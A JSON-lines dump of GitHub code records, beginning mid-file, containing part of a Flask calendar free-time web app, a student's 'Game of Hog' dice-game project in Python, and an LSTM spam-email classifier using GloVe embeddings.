list[i+1]['end'] = event['end'] #prevents problems with next iteration\n elif (event['end'] >= next_event['start']):\n new_list.append({'start':event['start'], 'end':next_event['start']})\n else:\n new_list.append({'start':event['start'], 'end':event['end']})\n #add last event to new_list\n new_list.append(list[list_size-1])\n return new_list\n\n\n#add nights as events so free time is from 9am-5pm(normal work day)\ndef addNights(list, sd, ed):\n start_date = arrow.get(sd)\n #end_date = arrow.get(ed).replace(hours=-24)\n end_date = arrow.get(ed)\n for day in arrow.Arrow.span_range('day', start_date, end_date): #goes through day range\n early_morning = {'start':day[0], 'end':day[0].replace(hours=+9)}\n late_nights = {'start':day[1].replace(hours=-7).replace(seconds=+.000001), 'end':day[1].replace(seconds=+.000001)}\n list.append(early_morning)\n list.append(late_nights)\n return list\n\n\n#returns sorted list of events based off start times\ndef sortEvents(list):\n start_times = []\n #puts all the starts in a list\n for ev in list: #ev is event\n start_times.append(ev['start'])\n #sorts start times\n start_times.sort()\n sorted_times = []\n #puts ordered start times with the respective end times\n for times in start_times:\n for ev in list:\n if (times == ev['start']):\n sorted_times.append({'start':ev['start'], 'end':ev['end']})\n return sorted_times\n\n\n#gets list of events based off selected calendars\ndef calEventList(cal_list):\n begin_date = flask.session['begin_date'] #gets user inputed start date\n end_date = flask.session['end_date'] #gets user inputed end date\n end_date = arrow.get(end_date).replace(hours=+24).isoformat() #add 24 hours to include whole day\n #flask.session['end_date'] = end_date\n busy_times = []\n for cal in cal_list:\n calID = cal['id']\n freebusy_query = {\n \"timeMin\" : begin_date,\n \"timeMax\" : end_date,\n \"items\" : [{ \"id\" : calID }]\n }\n result = gcal_service.freebusy().query(body=freebusy_query).execute()\n result_times = result['calendars'][calID]['busy']\n busy_times.append(result_times)\n return busy_times\n\n\ndef list_calendars(service):\n \"\"\"\n Given a google 'service' object, return a list of\n calendars. Each calendar is represented by a dict, so that\n it can be stored in the session object and converted to\n json for cookies. 
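\n\n    Each dict looks roughly like this (illustrative values only):\n    {'kind': 'calendar#calendarListEntry', 'id': 'me@example.com',\n     'summary': 'Work', 'selected': True, 'primary': False}\n\n    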
The returned list is sorted to have\n the primary calendar first, and selected (that is, displayed in\n Google Calendars web app) calendars before unselected calendars.\n \"\"\"\n app.logger.debug(\"Entering list_calendars\")\n calendar_list = service.calendarList().list().execute()[\"items\"]\n result = []\n for cal in calendar_list:\n kind = cal[\"kind\"]\n id = cal[\"id\"]\n if \"description\" in cal:\n desc = cal[\"description\"]\n else:\n desc = \"(no description)\"\n summary = cal[\"summary\"]\n # Optional binary attributes with False as default\n selected = (\"selected\" in cal) and cal[\"selected\"]\n primary = (\"primary\" in cal) and cal[\"primary\"]\n\n\n result.append(\n { \"kind\": kind,\n \"id\": id,\n \"summary\": summary,\n \"selected\": selected,\n \"primary\": primary\n })\n return sorted(result, key=cal_sort_key)\n\n\ndef cal_sort_key( cal ):\n \"\"\"\n Sort key for the list of calendars: primary calendar first,\n then other selected calendars, then unselected calendars.\n (\" \" sorts before \"X\", and tuples are compared piecewise)\n \"\"\"\n if cal[\"selected\"]:\n selected_key = \" \"\n else:\n selected_key = \"X\"\n if cal[\"primary\"]:\n primary_key = \" \"\n else:\n primary_key = \"X\"\n return (primary_key, selected_key, cal[\"summary\"])\n\n\n#################\n#\n# Functions used within the templates\n#\n#################\n\n@app.template_filter( 'fmtdate' )\ndef format_arrow_date( date ):\n try:\n normal = arrow.get( date )\n return normal.format(\"ddd MM/DD/YYYY\")\n except:\n return \"(bad date)\"\n\n@app.template_filter( 'fmttime' )\ndef format_arrow_time( time ):\n try:\n normal = arrow.get( time )\n return normal.format(\"HH:mm\")\n except:\n return \"(bad time)\"\n\n#############\n\n\nif __name__ == \"__main__\":\n # App is created above so that it will\n # exist whether this is 'main' or not\n # (e.g., if we are running in a CGI script)\n\n app.secret_key = str(uuid.uuid4())\n app.debug=CONFIG.DEBUG\n app.logger.setLevel(logging.DEBUG)\n # We run on localhost only if debugging,\n # otherwise accessible to world\n if CONFIG.DEBUG:\n # Reachable only from the same computer\n app.run(port=CONFIG.PORT)\n else:\n # Reachable from anywhere\n app.run(port=CONFIG.PORT,host=\"0.0.0.0\")\n\n", "repo_name": "rghusbands/Meet-Me-Web-App", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 21446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 34, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "CONFIG.MONGO_URL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "CONFIG.GOOGLE_LICENSE_KEY", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.session.pop", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.session", 
"line_number": 120, "usage_type": "attribute"}, {"api_name": "oauth2client.client.OAuth2Credentials.from_json", "line_number": 123, "usage_type": "call"}, {"api_name": "oauth2client.client.OAuth2Credentials", "line_number": 123, "usage_type": "attribute"}, {"api_name": "oauth2client.client", "line_number": 123, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 124, "usage_type": "attribute"}, {"api_name": "httplib2.Http", "line_number": 143, "usage_type": "call"}, {"api_name": "apiclient.discovery.build", "line_number": 144, "usage_type": "call"}, {"api_name": "apiclient.discovery", "line_number": 144, "usage_type": "name"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 158, "usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 170, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 173, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 204, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 204, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 206, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 206, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 211, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 211, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 266, "usage_type": "call"}, {"api_name": 
"flask.session", "line_number": 266, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 267, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 273, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 287, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 287, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 288, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 288, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 288, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 289, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 291, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 294, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 296, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 302, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 303, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 308, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.request.form.getlist", "line_number": 314, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 314, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 314, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 315, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 317, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 320, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 321, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 324, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 327, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 336, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 337, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 341, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 345, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 345, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 359, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 362, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 363, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 364, "usage_type": 
"attribute"}, {"api_name": "flask.session", "line_number": 368, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 369, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 381, "usage_type": "call"}, {"api_name": "dateutil.tz.tzlocal", "line_number": 381, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 381, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 385, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 396, "usage_type": "call"}, {"api_name": "dateutil.tz.tzlocal", "line_number": 397, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 397, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 399, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 407, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 422, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 423, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 441, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 464, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 510, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 512, "usage_type": "call"}, {"api_name": "arrow.Arrow.span_range", "line_number": 513, "usage_type": "call"}, {"api_name": "arrow.Arrow", "line_number": 513, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 540, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 541, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 542, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 619, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 627, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 640, "usage_type": "call"}, {"api_name": "CONFIG.DEBUG", "line_number": 641, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 642, "usage_type": "attribute"}, {"api_name": "CONFIG.DEBUG", "line_number": 645, "usage_type": "attribute"}, {"api_name": "CONFIG.PORT", "line_number": 647, "usage_type": "attribute"}, {"api_name": "CONFIG.PORT", "line_number": 650, "usage_type": "attribute"}]} +{"seq_id": "3681538071", "text": "\"\"\"The Game of Hog.\"\"\"\n\nfrom dice import four_sided, six_sided, make_test_dice\nfrom ucb import main, trace, log_current_line, interact\n\nGOAL_SCORE = 100 # The goal of Hog is to score 100 points.\n\n\n######################\n # Simulator #\n######################\n\n\ndef roll_dice(num_rolls, dice=six_sided):\n \"\"\"Simulate rolling the DICE exactly NUM_ROLLS times. Return the sum of\n the outcomes unless any of the outcomes is 1. 
In that case, return 0.\n \"\"\"\n # These assert statements ensure that num_rolls is a positive integer.\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls > 0, 'Must roll at least once.'\n total = 0\n rolls = 1\n is_one = False\n while rolls <= num_rolls:\n roll = dice()\n total += roll\n rolls += 1\n if roll == 1:\n is_one = True\n if is_one == True:\n return 0\n else:\n return total\n\ndef is_prime(n):\n if n == 0:\n return False\n if n == 1:\n return False\n factor = 2\n while factor < n:\n if n % factor == 0:\n return False\n factor += 1\n return True\n\ndef next_prime(n):\n n = n + 1\n value = True\n while value:\n if is_prime(n) == True:\n return n\n n += 1\n\ndef take_turn(num_rolls, opponent_score, dice=six_sided):\n \"\"\"Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free bacon).\n\n num_rolls: The number of dice rolls that will be made.\n opponent_score: The total score of the opponent.\n dice: A function of no args that returns an integer outcome.\n \"\"\"\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls >= 0, 'Cannot roll a negative number of dice.'\n assert num_rolls <= 10, 'Cannot roll more than 10 dice.'\n assert opponent_score < 100, 'The game should be over.'\n score = 0\n opp_dig1 = (opponent_score // 10) % 10\n opp_dig2 = (opponent_score % 10)\n if num_rolls == 0:\n score += 1 + max(opp_dig1, opp_dig2)\n else:\n score += roll_dice(num_rolls, dice)\n if is_prime(score):\n return next_prime(score)\n else:\n return score\n\n\ndef select_dice(score, opponent_score):\n \"\"\"Select six-sided dice unless the sum of SCORE and OPPONENT_SCORE is a\n multiple of 7, in which case select four-sided dice (Hog wild).\n \"\"\"\n if (score + opponent_score) % 7 == 0:\n return four_sided\n else:\n return six_sided\n\n\ndef is_swap(score0, score1):\n \"\"\"Returns whether the last two digits of SCORE0 and SCORE1 are reversed\n versions of each other, such as 19 and 91.\n \"\"\"\n return (score0 // 10) % 10 == (score1 % 10) and (score0 % 10) == (score1 // 10) % 10\n\n\ndef other(who):\n \"\"\"Return the other player, for a player WHO numbered 0 or 1.\n\n >>> other(0)\n 1\n >>> other(1)\n 0\n \"\"\"\n return 1 - who\n\n\ndef play(strategy0, strategy1, score0=0, score1=0, goal=GOAL_SCORE):\n \"\"\"Simulate a game and return the final scores of both players, with\n Player 0's score first, and Player 1's score second.\n\n A strategy is a function that takes two total scores as arguments\n (the current player's score, and the opponent's score), and returns a\n number of dice that the current player will roll this turn.\n\n strategy0: The strategy function for Player 0, who plays first\n strategy1: The strategy function for Player 1, who plays second\n score0 : The starting score for Player 0\n score1 : The starting score for Player 1\n \"\"\"\n who = 0 # Which player is about to take a turn, 0 (first) or 1 (second)\n while score0 < goal and score1 < goal:\n dice = select_dice(score0, score1)\n if who == 0:\n rolls = strategy0(score0, score1)\n turn_score = take_turn(rolls, score1, dice)\n score0 += turn_score\n if turn_score == 0:\n score1 += rolls\n else:\n rolls = strategy1(score1, score0)\n turn_score = take_turn(rolls, score0, dice)\n score1 += turn_score\n if turn_score == 0:\n score0 += rolls\n if is_swap(score0, score1):\n score0, score1 = score1, score0\n who = other(who)\n return score0, score1\n\n\n#######################\n # Strategies #\n#######################\n\n\ndef always_roll(n):\n \"\"\"Return a 
strategy that always rolls N dice.\n\n A strategy is a function that takes two total scores as arguments\n (the current player's score, and the opponent's score), and returns a\n number of dice that the current player will roll this turn.\n\n >>> strategy = always_roll(5)\n >>> strategy(0, 0)\n 5\n >>> strategy(99, 99)\n 5\n \"\"\"\n def strategy(score, opponent_score):\n return n\n\n return strategy\n\n\n# Experiments\n\ndef make_averaged(fn, num_samples=1000):\n \"\"\"Return a function that returns the average_value of FN when called.\n\n To implement this function, you will have to use *args syntax, a new Python\n feature introduced in this project. See the project description.\n\n >>> dice = make_test_dice(3, 1, 5, 6)\n >>> averaged_dice = make_averaged(dice, 1000)\n >>> averaged_dice()\n 3.75\n >>> make_averaged(roll_dice, 1000)(2, dice)\n 5.5\n\n In this last example, two different turn scenarios are averaged.\n - In the first, the player rolls a 3 then a 1, receiving a score of 0.\n - In the other, the player rolls a 5 and 6, scoring 11.\n Thus, the average value is 5.5.\n Note that the last example uses roll_dice so the hogtimus prime rule does\n not apply.\n \"\"\"\n def average_value(*args):\n sample = 1\n total = 0\n while sample <= num_samples:\n total += fn(*args)\n sample += 1\n return total / num_samples\n return average_value\n\n\ndef max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n \"\"\"Return the number of dice (1 to 10) that gives the highest average turn\n score by calling roll_dice with the provided DICE over NUM_SAMPLES times.\n Assume that dice always return positive outcomes.\n\n >>> dice = make_test_dice(3)\n >>> max_scoring_num_rolls(dice)\n 10\n \"\"\"\n rolls = 1\n num_dice = 1\n old_value = 0\n average_function = make_averaged(roll_dice, num_samples)\n while rolls <= 10:\n new_value = average_function(rolls, dice)\n if old_value < new_value:\n old_value = new_value\n num_dice = rolls\n rolls += 1\n return num_dice\n\n\ndef winner(strategy0, strategy1):\n \"\"\"Return 0 if strategy0 wins against strategy1, and 1 otherwise.\"\"\"\n score0, score1 = play(strategy0, strategy1)\n if score0 > score1:\n return 0\n else:\n return 1\n\n\ndef average_win_rate(strategy, baseline=always_roll(5)):\n \"\"\"Return the average win rate of STRATEGY against BASELINE. 
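\n\n    A returned value of 0.7, for instance, would mean STRATEGY won roughly\n    70% of the simulated games; exact numbers vary between runs because the\n    dice are random.\n\n    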
Averages the\n    win rate when starting the game as player 0 and as player 1.\n    \"\"\"\n    win_rate_as_player_0 = 1 - make_averaged(winner)(strategy, baseline)\n    win_rate_as_player_1 = make_averaged(winner)(baseline, strategy)\n\n    return (win_rate_as_player_0 + win_rate_as_player_1) / 2\n\n\ndef run_experiments():\n    \"\"\"Run a series of strategy experiments and report results.\"\"\"\n    if True: # Change to False when done finding max_scoring_num_rolls\n        six_sided_max = max_scoring_num_rolls(six_sided)\n        print('Max scoring num rolls for six-sided dice:', six_sided_max)\n        four_sided_max = max_scoring_num_rolls(four_sided)\n        print('Max scoring num rolls for four-sided dice:', four_sided_max)\n\n    if False: # Change to True to test always_roll(8)\n        print('always_roll(8) win rate:', average_win_rate(always_roll(8)))\n\n    if False: # Change to True to test bacon_strategy\n        print('bacon_strategy win rate:', average_win_rate(bacon_strategy))\n\n    if False: # Change to True to test swap_strategy\n        print('swap_strategy win rate:', average_win_rate(swap_strategy))\n\n    \"*** You may add additional experiments as you wish ***\"\n\n\n# Strategies\ndef add_dig(score):\n    value = max((score % 10) + 1, ((score // 10) % 10) + 1)\n    if is_prime(value):\n        value = next_prime(value)\n    return value\n\ndef bacon_strategy(score, opponent_score, margin=8, num_rolls=5):\n    \"\"\"This strategy rolls 0 dice if that gives at least MARGIN points,\n    and rolls NUM_ROLLS otherwise.\n    \"\"\"\n    new_dig = add_dig(opponent_score)\n    if margin <= new_dig:\n        return 0\n    return num_rolls \n\n\ndef swap_strategy(score, opponent_score, num_rolls=5):\n    \"\"\"This strategy rolls 0 dice when it results in a beneficial swap and\n    rolls NUM_ROLLS otherwise.\n    \"\"\"\n    new_dig = add_dig(opponent_score)\n    if is_swap(score + new_dig, opponent_score):\n        if opponent_score > score + new_dig:\n            return 0\n    return num_rolls \n\n\ndef final_strategy(score, opponent_score):\n    \"\"\"A brief description of the final strategy:\n\n    First we use the ADD_DIG function to see what score would be added if no dice are rolled.\n    The first IF statement will return 4 instead of swapping with 0 if the opponent has a lower score, which guarantees not making a harmful swap.\n    Then the swap_strategy is run, followed by the bacon_strategy.\n    The next IF statement implements a strategy of rolling 0 dice if the result is the opponent being forced to roll four_sided dice instead of six_sided.\n    Lastly if none of the previous strategies are implementable, we will roll 4 dice, since that resulted in the highest win rate.\n    \"\"\"\n    new_dig = add_dig(opponent_score)\n    if is_swap(score + new_dig, opponent_score) and (score + new_dig) > opponent_score:\n        return 4\n    if swap_strategy(score, opponent_score, 6) == 0:\n        return 0\n    if bacon_strategy(score, opponent_score, 6, 6) == 0:\n        return 0\n    if (new_dig + score + opponent_score) % 7 == 0:\n        return 0\n    return 4 \n\n\n##########################\n# Command Line Interface #\n##########################\n\n\n# Note: Functions in this section do not need to be changed. 
They use features\n# of Python not yet covered in the course.\n\n\n@main\ndef run(*args):\n \"\"\"Read in the command-line argument and calls corresponding functions.\n\n This function uses Python syntax/techniques not yet covered in this course.\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description=\"Play Hog\")\n parser.add_argument('--run_experiments', '-r', action='store_true',\n help='Runs strategy experiments')\n\n args = parser.parse_args()\n\n if args.run_experiments:\n run_experiments()\n", "repo_name": "shivmpatel12/samples", "sub_path": "hog.py", "file_name": "hog.py", "file_ext": "py", "file_size_in_byte": 10596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dice.six_sided", "line_number": 14, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 55, "usage_type": "name"}, {"api_name": "dice.four_sided", "line_number": 84, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 86, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 197, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 241, "usage_type": "argument"}, {"api_name": "dice.four_sided", "line_number": 243, "usage_type": "argument"}, {"api_name": "argparse.ArgumentParser", "line_number": 323, "usage_type": "call"}, {"api_name": "ucb.main", "line_number": 316, "usage_type": "name"}]} +{"seq_id": "6648979110", "text": "## for data\r\nimport pandas as pd\r\nimport numpy as np\r\nimport string\r\n## for processing\r\nimport re\r\nfrom keras_preprocessing.sequence import pad_sequences\r\nfrom keras_preprocessing.text import Tokenizer\r\nfrom nltk import word_tokenize\r\nfrom nltk.corpus import stopwords\r\n## for deep learning\r\nfrom sklearn import model_selection\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras import backend as K\r\nfrom tensorflow.keras import Sequential\r\nfrom keras.initializers.initializers_v2 import Constant\r\n\r\n\r\n\r\n#load dataset\r\ndtf = pd.read_csv(\"spam_or_not_spam.csv\") #passing the dataset into a pandas dataframe\r\n\r\n\r\n\r\n## rename columns\r\ndtf = dtf.rename(columns={\"label\":\"y\", \"email\":\"text\"})\r\n\r\n\r\ndtf[\"text\"] = dtf[\"text\"].apply(str)\r\n\r\n\r\n#functions for data preprocessing\r\ndef remove_URL(text):\r\n url = re.compile(r\"https?://\\S+|www\\.\\S+\")\r\n return url.sub(r\"\", text)\r\n\r\n\r\ndef remove_html(text):\r\n html = re.compile(r\"<.*?>\")\r\n return html.sub(r\"\", text)\r\n\r\ndef remove_emoji(string):\r\n emoji_pattern = re.compile(\r\n \"[\"\r\n u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U000024C2-\\U0001F251\"\r\n \"]+\",\r\n flags=re.UNICODE,\r\n )\r\n return emoji_pattern.sub(r\"\", string)\r\n\r\n\r\ndef remove_punct(text):\r\n table = str.maketrans(\"\", \"\", string.punctuation)\r\n return text.translate(table)\r\n\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_URL(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_html(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_emoji(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_punct(x))\r\n\r\nstop = set(stopwords.words(\"english\"))\r\n\r\n\r\ndef remove_stopwords(text):\r\n text = [word.lower() for word in text.split() if word.lower() not in stop]\r\n\r\n return \" 
\".join(text)\r\n\r\ndtf[\"text\"] = dtf[\"text\"].map(remove_stopwords)\r\n\r\n#function for corpus creation\r\ndef create_corpus_tk(df):\r\n corpus = []\r\n for text in dtf[\"text\"]:\r\n words = [word.lower() for word in word_tokenize(text)]\r\n corpus.append(words)\r\n return corpus\r\n\r\ncorpus = create_corpus_tk(dtf)\r\nnum_words = len(corpus)\r\n\r\n#dataset split\r\ntrain, test = model_selection.train_test_split(dtf, test_size=0.25)\r\n\r\nmax_len = 50\r\n\r\n#create the vocabulary of indices\r\ntokenizer = Tokenizer(num_words=num_words)\r\ntokenizer.fit_on_texts(train[\"text\"])\r\n\r\n#text to indices\r\ntrain_sequences = tokenizer.texts_to_sequences(train[\"text\"])\r\n\r\n#padding sequences\r\ntrain_padded = pad_sequences(\r\n train_sequences, maxlen=max_len, truncating=\"post\", padding=\"post\"\r\n)\r\n#text to indices\r\ntest_sequences = tokenizer.texts_to_sequences(test[\"text\"])\r\n\r\n#padding sequences\r\ntest_padded = pad_sequences(\r\n test_sequences, maxlen=max_len, padding=\"post\", truncating=\"post\"\r\n)\r\nword_index = tokenizer.word_index\r\n\r\n#creating embedding dictionary\r\nembedding_dict = {}\r\nwith open('glove.6B.100d.txt', encoding=\"utf8\") as f:\r\n for line in f:\r\n values = line.split()\r\n word = values[0]\r\n vectors = np.asarray(values[1:], \"float32\")\r\n embedding_dict[word] = vectors\r\nf.close()\r\n\r\n#initilize embedding matrix\r\nnum_words = len(word_index) + 1\r\nembedding_matrix = np.zeros((num_words, 100))\r\n\r\n#values in embedding matrix\r\nfor word, i in word_index.items():\r\n if i < num_words:\r\n emb_vec = embedding_dict.get(word)\r\n if emb_vec is not None:\r\n embedding_matrix[i] = emb_vec\r\n\r\n\r\n#building LSTM RNN\r\nmodel = Sequential()\r\n\r\nmodel.add(\r\n layers.Embedding(\r\n num_words,\r\n 100,\r\n embeddings_initializer=Constant(embedding_matrix),\r\n input_length=max_len,\r\n trainable=False,\r\n )\r\n)\r\nmodel.add(layers.LSTM(100, dropout=0.1))\r\nmodel.add(layers.Dense(1, activation=\"sigmoid\"))\r\n\r\n#metrics functions\r\ndef recall_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\ndef precision_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision\r\n\r\ndef f1_m(y_true, y_pred):\r\n precision = precision_m(y_true, y_pred)\r\n recall = recall_m(y_true, y_pred)\r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\n\r\n#compile model\r\nmodel.compile(loss=\"binary_crossentropy\", optimizer='adam', metrics=['acc',f1_m,precision_m, recall_m])\r\n\r\n#train model\r\nhistory = model.fit(\r\n train_padded,\r\n train[\"y\"],\r\n epochs=20,\r\n validation_data=(test_padded, test[\"y\"]),\r\n verbose=1,\r\n)\r\n\r\n# evaluate model\r\nloss, accuracy, f1_score, precision, recall = model.evaluate(test_padded, test[\"y\"], verbose=1)\r\nprint('Accuracy: %f' % accuracy)\r\nprint('Precision: %f' % precision)\r\nprint('Recall: %f' % recall)\r\nprint('F1 score: %f' % f1_score)\r\n\r\n\r\n", "repo_name": "katderv/Text-Classification-with-RNN-and-GloVe", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": 
